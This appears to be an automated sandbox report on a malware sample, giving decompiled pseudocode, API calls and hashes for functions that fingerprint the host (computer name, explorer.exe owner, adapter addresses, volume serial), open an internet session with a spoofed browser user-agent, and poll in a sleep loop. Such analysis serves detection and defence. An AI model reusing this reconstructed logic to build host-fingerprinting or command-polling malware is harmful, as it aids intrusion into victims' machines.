                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612F10, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E00612F10(char _a4, CHAR* _a8) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				char _v280;
				void* _t29;
				void* _t48;

				_t1 =  &_a4; // 0x612de3
				_t29 = OpenProcess(0x400, 0,  *_t1);
				_v12 = _t29;
				if(_v12 == 0) {
					L12:
					return 0;
				}
				_push(0x104);
				_push( &_v280);
				_push(_v12); // executed
				L00613BC3(); // executed
				_v20 = _t29;
				FindCloseChangeNotification(_v12); // executed
				if(_v20 <= 0) {
					goto L12;
				}
				_v16 = 0;
				_v8 = 0;
				while(_v8 < _v20) {
					if( *((char*)(_t48 + _v8 - 0x114)) == 0x5c) {
						_v16 = _t48 + _v8 - 0x113;
					}
					if( *((char*)(_t48 + _v8 - 0x114)) != 0) {
						_v8 = _v8 + 1;
						continue;
					} else {
						break;
					}
				}
				if(_v16 == 0) {
					goto L12;
				}
				lstrcpyA(_a8, _v16);
				return 1;
			}










                                                                                                                                                    0x00612f19
                                                                                                                                                    0x00612f24
                                                                                                                                                    0x00612f2a
                                                                                                                                                    0x00612f31
                                                                                                                                                    0x00612fcb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612fcb
                                                                                                                                                    0x00612f37
                                                                                                                                                    0x00612f42
                                                                                                                                                    0x00612f46
                                                                                                                                                    0x00612f47
                                                                                                                                                    0x00612f4c
                                                                                                                                                    0x00612f53
                                                                                                                                                    0x00612f5d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612f5f
                                                                                                                                                    0x00612f66
                                                                                                                                                    0x00612f78
                                                                                                                                                    0x00612f8e
                                                                                                                                                    0x00612f9a
                                                                                                                                                    0x00612f9a
                                                                                                                                                    0x00612faa
                                                                                                                                                    0x00612f75
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612fac
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612fac
                                                                                                                                                    0x00612faa
                                                                                                                                                    0x00612fb4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612fbe
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,-a), ref: 00612F24
                                                                                                                                                    • K32GetProcessImageFileNameA.KERNEL32(00000000,?,00000104), ref: 00612F47
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,00000104), ref: 00612F53
                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,00000000), ref: 00612FBE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$ChangeCloseFileFindImageNameNotificationOpenlstrcpy
                                                                                                                                                    • String ID: -a
                                                                                                                                                    • API String ID: 1999166229-4272857021
                                                                                                                                                    • Opcode ID: b6f7d735d83d3e74eb75490b3008c13244bed794a3e81d2686aad1bb38f28190
                                                                                                                                                    • Instruction ID: 27f039d74afce2555b7e2cf0819eeab5d27b2b0c66ff9158c9556d8ea0d0cda4
                                                                                                                                                    • Opcode Fuzzy Hash: b6f7d735d83d3e74eb75490b3008c13244bed794a3e81d2686aad1bb38f28190
                                                                                                                                                    • Instruction Fuzzy Hash: 2A216770E0410DEFCB14CF98C9A4BEDB7B6BB08701F2484A9E616A7280D7745A92DF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006130D0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E006130D0(CHAR* _a4) {
				long _v8;
				char _v268;
				char _v528;
				int _t14;
				void* _t16;

				 *_a4 = 0;
				_v8 = 0x104;
				_t14 = GetComputerNameA( &_v268,  &_v8);
				_t31 = _t14;
				if(_t14 != 0) {
					lstrcatA(_a4,  &_v268);
				}
				lstrcatA(_a4, " @ ");
				_t16 = E00612DD0(_t31,  &_v528); // executed
				if(_t16 != 0) {
					lstrcatA(_a4,  &_v528);
				}
				return 1;
			}








                                                                                                                                                    0x006130e4
                                                                                                                                                    0x006130e8
                                                                                                                                                    0x006130fa
                                                                                                                                                    0x00613100
                                                                                                                                                    0x00613102
                                                                                                                                                    0x0061310f
                                                                                                                                                    0x0061310f
                                                                                                                                                    0x0061311e
                                                                                                                                                    0x0061312b
                                                                                                                                                    0x00613135
                                                                                                                                                    0x00613142
                                                                                                                                                    0x00613142
                                                                                                                                                    0x00613150

                                                                                                                                                    APIs
                                                                                                                                                    • GetComputerNameA.KERNEL32 ref: 006130FA
                                                                                                                                                    • lstrcatA.KERNEL32(00100000,?), ref: 0061310F
                                                                                                                                                    • lstrcatA.KERNEL32(00100000, @ ), ref: 0061311E
                                                                                                                                                    • lstrcatA.KERNEL32(00100000,?), ref: 00613142
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$ComputerName
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 2583549208-203157567
                                                                                                                                                    • Opcode ID: 653fd899bb22fabb628ae20909ecdbacdfde5cde206577dd04c7bb512d389161
                                                                                                                                                    • Instruction ID: 958b08338a71518b36d4a42bb6edd0bf0a910d13254053cfe28c6fa50a45eab7
                                                                                                                                                    • Opcode Fuzzy Hash: 653fd899bb22fabb628ae20909ecdbacdfde5cde206577dd04c7bb512d389161
                                                                                                                                                    • Instruction Fuzzy Hash: EF0186B5500308ABDB14DFA5DC49BDA7B7AAB48301F0481A9FA0A87251DB75DBC4CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612E70, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                    			E00612E70(char _a4) {
				signed int _v8;
				char _v12;
				unsigned int _v16;
				char _v276;
				char _v4372;
				signed int _t23;
				void* _t26;
				int _t29;
				void* _t40;
				void* _t41;

				E00611420(0x1110);
				_t1 =  &_v12; // 0x612de3
				_t23 = _t1;
				_push(_t23);
				_push(0x1000);
				_push( &_v4372); // executed
				L00613BBD(); // executed
				if(_t23 != 0) {
					_t3 =  &_v12; // 0x612de3
					_v16 =  *_t3 >> 2;
					_v8 = 0;
					while(_v8 < _v16) {
						_t26 = E00612F10( *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110)),  &_v276); // executed
						_t41 = _t41 + 8;
						if(_t26 == 0) {
							L8:
							_t23 = _v8 + 1;
							_v8 = _t23;
							continue;
						}
						_t15 =  &_a4; // 0x612de3
						_t29 = lstrcmpiA( &_v276,  *_t15); // executed
						if(_t29 != 0) {
							goto L8;
						}
						return  *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110));
					}
					return _t23 | 0xffffffff;
				}
				return _t23 | 0xffffffff;
			}













                                                                                                                                                    0x00612e78
                                                                                                                                                    0x00612e7d
                                                                                                                                                    0x00612e7d
                                                                                                                                                    0x00612e80
                                                                                                                                                    0x00612e81
                                                                                                                                                    0x00612e8c
                                                                                                                                                    0x00612e8d
                                                                                                                                                    0x00612e94
                                                                                                                                                    0x00612e9b
                                                                                                                                                    0x00612ea1
                                                                                                                                                    0x00612ea4
                                                                                                                                                    0x00612eb6
                                                                                                                                                    0x00612ed0
                                                                                                                                                    0x00612ed5
                                                                                                                                                    0x00612eda
                                                                                                                                                    0x00612efd
                                                                                                                                                    0x00612eb0
                                                                                                                                                    0x00612eb3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612eb3
                                                                                                                                                    0x00612edc
                                                                                                                                                    0x00612ee7
                                                                                                                                                    0x00612eef
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612ef4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612eff
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • K32EnumProcesses.KERNEL32(?,00001000,-a,?,00612DE3,explorer.exe), ref: 00612E8D
                                                                                                                                                    • lstrcmpiA.KERNEL32(?,-a,?,?,00612DE3), ref: 00612EE7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumProcesseslstrcmpi
                                                                                                                                                    • String ID: -a$-a
                                                                                                                                                    • API String ID: 1246086236-4070510245
                                                                                                                                                    • Opcode ID: 5230e7c4336aae0ee573e4c5f19d88874751ae7a794ad4d531472d75597ee08a
                                                                                                                                                    • Instruction ID: b58189bb78c98feb3f7ec35f38615bb98f719e40e3ddcad362808e31c58a9fa6
                                                                                                                                                    • Opcode Fuzzy Hash: 5230e7c4336aae0ee573e4c5f19d88874751ae7a794ad4d531472d75597ee08a
                                                                                                                                                    • Instruction Fuzzy Hash: 0D115270D00109EBCB14CF98D851AEDB7BABF48344F18459DF62597280E734AED09B54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612DD0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00612DD0(void* __eflags, CHAR* _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v276;
				char _v536;
				long _t16;
				void* _t20;

				_t16 = E00612E70("explorer.exe"); // executed
				_v16 = _t16;
				_v12 = 0x104;
				_v8 = 0x104;
				 *_a4 = 0;
				_t20 = E00612FE0(_v16,  &_v536, _v12,  &_v276, _v8); // executed
				if(_t20 == 0) {
					return 0;
				}
				lstrcpyA(_a4,  &_v276);
				lstrcatA(_a4, "\\");
				lstrcatA(_a4,  &_v536);
				return 1;
			}










                                                                                                                                                    0x00612dde
                                                                                                                                                    0x00612de6
                                                                                                                                                    0x00612de9
                                                                                                                                                    0x00612df0
                                                                                                                                                    0x00612e02
                                                                                                                                                    0x00612e20
                                                                                                                                                    0x00612e2a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00612e64
                                                                                                                                                    0x00612e37
                                                                                                                                                    0x00612e46
                                                                                                                                                    0x00612e57
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00612E70: K32EnumProcesses.KERNEL32(?,00001000,-a,?,00612DE3,explorer.exe), ref: 00612E8D
                                                                                                                                                      • Part of subcall function 00612FE0: OpenProcess.KERNEL32(00000400,00000000,?,?,00612E25,?,?,00000104,?,00000104), ref: 00612FF1
                                                                                                                                                    • lstrcpyA.KERNEL32(00000104,?), ref: 00612E37
                                                                                                                                                    • lstrcatA.KERNEL32(00000104,006142B8), ref: 00612E46
                                                                                                                                                    • lstrcatA.KERNEL32(00000104,?), ref: 00612E57
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$EnumOpenProcessProcesseslstrcpy
                                                                                                                                                    • String ID: explorer.exe
                                                                                                                                                    • API String ID: 1774016706-3187896405
                                                                                                                                                    • Opcode ID: e839d241ed37c9d0ea944d5d151d4f0e5e077a8365915abcd6766fb186695705
                                                                                                                                                    • Instruction ID: 22ba7462aa6615f85f4df30c38758caac7e2cb48afe2ac306ae76e864646d26a
                                                                                                                                                    • Opcode Fuzzy Hash: e839d241ed37c9d0ea944d5d151d4f0e5e077a8365915abcd6766fb186695705
                                                                                                                                                    • Instruction Fuzzy Hash: 7E1144B5900249ABCB14DFA8DD45EDE7BBAAB48300F048199F60997241D674DAC4CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00668070, Relevance: 4.9, APIs: 3, Instructions: 446COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetConsoleCP.KERNEL32(000004E3,006A906C), ref: 006680B1
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007E9,006B0470), ref: 0066820E
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00746AD0,000007E9), ref: 00668461
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Directory$ConsoleCurrentSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1220519660-0
                                                                                                                                                    • Opcode ID: 63bcae638903886e31d9649672c06f30ab2e13c414313b4d3f3c22bb84f5091f
                                                                                                                                                    • Instruction ID: 6e54bee8c3ece6117e0bb3178c84fe1a7ec2abfbcb00727c160c67ad56152062
                                                                                                                                                    • Opcode Fuzzy Hash: 63bcae638903886e31d9649672c06f30ab2e13c414313b4d3f3c22bb84f5091f
                                                                                                                                                    • Instruction Fuzzy Hash: 96F1B0795062906FD708AB3AECE52E67FE3E797310B28615FD181873A2D6386449CF31
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065953A, Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0065953E
                                                                                                                                                    • _free.LIBCMT ref: 00659577
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0065957E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentStrings$Free_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2716640707-0
                                                                                                                                                    • Opcode ID: ffcd212c54b25c86f7817b7e8bdd2f28ad37a252328711a107ccf884d8a20578
                                                                                                                                                    • Instruction ID: 7167a0f0823cf492498e4bef3a544056bde57c789ce65969d2e33123834ce96f
                                                                                                                                                    • Opcode Fuzzy Hash: ffcd212c54b25c86f7817b7e8bdd2f28ad37a252328711a107ccf884d8a20578
                                                                                                                                                    • Instruction Fuzzy Hash: 77E02B37504A20BAD35233393C49AAF095BCFC13B2F350329FC1993282BE209D0B01B5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00611C50, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                    			E00611C50(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t61;
				void* _t62;

				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				_v12 = 0x8000;
				_t33 = E00611390(_v12); // executed
				_t62 = _t61 + 4;
				_v16 = _t33;
				_v8 = _v16;
				_t34 = _v8;
				__imp__GetAdaptersAddresses(2, 0, 0, _t34,  &_v12); // executed
				_v20 = _t34;
				if(_v20 == 0) {
					while(_v8 != 0) {
						_t11 =  &_v36; // 0x612625
						E006114A0(_t11, 0, 8);
						_t15 =  &_v36; // 0x612625
						E00611450(_t15, _v8 + 0x2c,  *((intOrPtr*)(_v8 + 0x34)));
						_t62 = _t62 + 0x18;
						_t17 =  &_v36; // 0x612625
						_v28 = _v28 ^  *_t17;
						_v24 = _v24 ^ _v32;
						_v8 =  *((intOrPtr*)(_v8 + 8));
					}
				}
				E006113D0(_v16); // executed
				_t36 = E00612470(); // executed
				_v44 = _t36;
				_v40 = 0;
				return E00611400(_v44, 0x20, _v40) ^ _v28;
			}


















                                                                                                                                                    0x00611c56
                                                                                                                                                    0x00611c59
                                                                                                                                                    0x00611c5e
                                                                                                                                                    0x00611c69
                                                                                                                                                    0x00611c6e
                                                                                                                                                    0x00611c71
                                                                                                                                                    0x00611c77
                                                                                                                                                    0x00611c7e
                                                                                                                                                    0x00611c88
                                                                                                                                                    0x00611c8e
                                                                                                                                                    0x00611c95
                                                                                                                                                    0x00611c97
                                                                                                                                                    0x00611ca1
                                                                                                                                                    0x00611ca5
                                                                                                                                                    0x00611cbb
                                                                                                                                                    0x00611cbf
                                                                                                                                                    0x00611cc4
                                                                                                                                                    0x00611cca
                                                                                                                                                    0x00611cd3
                                                                                                                                                    0x00611cd6
                                                                                                                                                    0x00611cdf
                                                                                                                                                    0x00611cdf
                                                                                                                                                    0x00611c97
                                                                                                                                                    0x00611ce8
                                                                                                                                                    0x00611cf0
                                                                                                                                                    0x00611cf7
                                                                                                                                                    0x00611cfa
                                                                                                                                                    0x00611d13

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00611390: GetProcessHeap.KERNEL32(?,00611886,00100000), ref: 0061139C
                                                                                                                                                      • Part of subcall function 00611390: RtlAllocateHeap.NTDLL(01380000,00000000,00611886,?,00611886,00100000), ref: 006113BD
                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,00008000), ref: 00611C88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$AdaptersAddressesAllocateProcess
                                                                                                                                                    • String ID: %&a
                                                                                                                                                    • API String ID: 2964925633-950833139
                                                                                                                                                    • Opcode ID: 1ce6167602efbce73df88afcba301ae0e0d63a0651428b68afbdd1776ef9ff42
                                                                                                                                                    • Instruction ID: 989055fdb6661d255ef3cc0a0c1169bd9616f6383ab1a3d5efd36fd9ec427f73
                                                                                                                                                    • Opcode Fuzzy Hash: 1ce6167602efbce73df88afcba301ae0e0d63a0651428b68afbdd1776ef9ff42
                                                                                                                                                    • Instruction Fuzzy Hash: 5E212BB4D00209ABDB44DBE4C982BEEFBB6BF4C304F144159EA05B7241D6746A80CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006124D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E006124D0() {
				void* _t1;
				void* _t2;

				if( *0x61726c == 0) {
					_t2 = InternetOpenA("Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", 0, 0, 0, 0); // executed
					 *0x61726c = _t2;
				}
				_t1 =  *0x61726c; // 0xcc0004
				return _t1;
			}





                                                                                                                                                    0x006124da
                                                                                                                                                    0x006124e9
                                                                                                                                                    0x006124ef
                                                                                                                                                    0x006124ef
                                                                                                                                                    0x006124f4
                                                                                                                                                    0x006124fa

                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 006124E9
                                                                                                                                                    Strings
                                                                                                                                                    • Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, xrefs: 006124E4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InternetOpen
                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    • API String ID: 2038078732-3333256863
                                                                                                                                                    • Opcode ID: 2d53fb27c709ed709b9d2c48dc38cd0bcee1c0f01a6e7b6f644eefec98144483
                                                                                                                                                    • Instruction ID: 9efff30e6eb5217f851d16a875a0df7bb483599ff36614cc73df547058876643
                                                                                                                                                    • Opcode Fuzzy Hash: 2d53fb27c709ed709b9d2c48dc38cd0bcee1c0f01a6e7b6f644eefec98144483
                                                                                                                                                    • Instruction Fuzzy Hash: 74D0C730A89344AAD3105745AC06BD132B69344B15F19D013BB08673D1CAF076D1CE05
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00612470, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00612470() {
				int _v8;
				long _v12;
				char _v272;
				int _t13;
				void* _t18;

				_v8 = GetWindowsDirectoryA( &_v272, 0x104);
				if(_v8 == 0) {
					L3:
					return 0;
				}
				 *((char*)(_t18 + 0xfffffffffffffef7)) = 0;
				_t13 = GetVolumeInformationA( &_v272, 0, 0,  &_v12, 0, 0, 0, 0); // executed
				if(_t13 == 0) {
					goto L3;
				}
				return _v12;
			}








                                                                                                                                                    0x0061248b
                                                                                                                                                    0x00612492
                                                                                                                                                    0x006124ca
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006124ca
                                                                                                                                                    0x0061249c
                                                                                                                                                    0x006124bb
                                                                                                                                                    0x006124c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00612485
                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006124BB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp Download File
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DirectoryInformationVolumeWindows
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3487004747-0
                                                                                                                                                    • Opcode ID: 96ceaf661601ce76eba58257516cae5898120ce403ddfef8bd96e3a5585d8d7f
                                                                                                                                                    • Instruction ID: 03ca42afa3ccadd0e096aa9fd441fc2290d9511f4f06c868452793df4bbdb5af
                                                                                                                                                    • Opcode Fuzzy Hash: 96ceaf661601ce76eba58257516cae5898120ce403ddfef8bd96e3a5585d8d7f
                                                                                                                                                    • Instruction Fuzzy Hash: 3DF05430A40309AAE724DBA4DC15BE977B99705B00F1441A5A645EA1C0DBF46AD8CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00611870, Relevance: 2.6, APIs: 2, Instructions: 85sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E00611870(void* __eflags) {
				intOrPtr _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t32;
				intOrPtr _t35;
				void* _t38;
				void* _t40;
				void* _t52;
				void* _t55;

				_v12 = 0x100000;
				_t28 = E00611390(_v12); // executed
				_v20 = _t28;
				_t29 = E00611390(_v12); // executed
				_v24 = _t29;
				_t30 = E00611390(0x1000);
				_t55 = _t52 + 0xc;
				_v8 = _t30;
				_v32 = 1;
				while(1) {
					_t58 = _v32 - 1;
					if(_v32 != 1) {
						break;
					}
					_t32 = E00611A80( &_v36, _t58, _v20, _v12,  &_v36); // executed
					_t55 = _t55 + 0xc;
					if(_t32 != 1) {
						L12:
						Sleep(0xea60); // executed
						_t30 = E006115C0();
						Sleep(0xea60); // executed
						continue;
					}
					_t35 = E00611560(_v20 + 4, _v24);
					_t55 = _t55 + 8;
					_v36 = _t35;
					_v16 = _v24;
					while(1 != 0) {
						_v16 = E006117B0(_v16, _v16, _v8);
						_t38 = E00612790(_v16, _v8);
						_t55 = _t55 + 0xc;
						if(_t38 == 1) {
							_v28 = 0;
							_t46 = _v8;
							_t40 = E00611630(_v8, _v8,  &_v28);
							_t55 = _t55 + 8;
							if(_t40 == 1 && _v28 == 0) {
								E006114E0(_t46, _v8);
								_t55 = _t55 + 4;
							}
						}
						if(_v16 != 0) {
							continue;
						} else {
							goto L12;
						}
					}
					goto L12;
				}
				return _t30;
			}




















                                                                                                                                                    0x00611876
                                                                                                                                                    0x00611881
                                                                                                                                                    0x00611889
                                                                                                                                                    0x00611890
                                                                                                                                                    0x00611898
                                                                                                                                                    0x006118a0
                                                                                                                                                    0x006118a5
                                                                                                                                                    0x006118a8
                                                                                                                                                    0x006118ab
                                                                                                                                                    0x006118b2
                                                                                                                                                    0x006118b2
                                                                                                                                                    0x006118b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006118c8
                                                                                                                                                    0x006118cd
                                                                                                                                                    0x006118d3
                                                                                                                                                    0x0061195a
                                                                                                                                                    0x0061195f
                                                                                                                                                    0x00611965
                                                                                                                                                    0x0061196f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0061196f
                                                                                                                                                    0x006118e4
                                                                                                                                                    0x006118e9
                                                                                                                                                    0x006118ec
                                                                                                                                                    0x006118f2
                                                                                                                                                    0x006118f5
                                                                                                                                                    0x0061190e
                                                                                                                                                    0x00611915
                                                                                                                                                    0x0061191a
                                                                                                                                                    0x00611920
                                                                                                                                                    0x00611922
                                                                                                                                                    0x0061192d
                                                                                                                                                    0x00611931
                                                                                                                                                    0x00611936
                                                                                                                                                    0x0061193c
                                                                                                                                                    0x00611948
                                                                                                                                                    0x0061194d
                                                                                                                                                    0x0061194d
                                                                                                                                                    0x0061193c
                                                                                                                                                    0x00611954
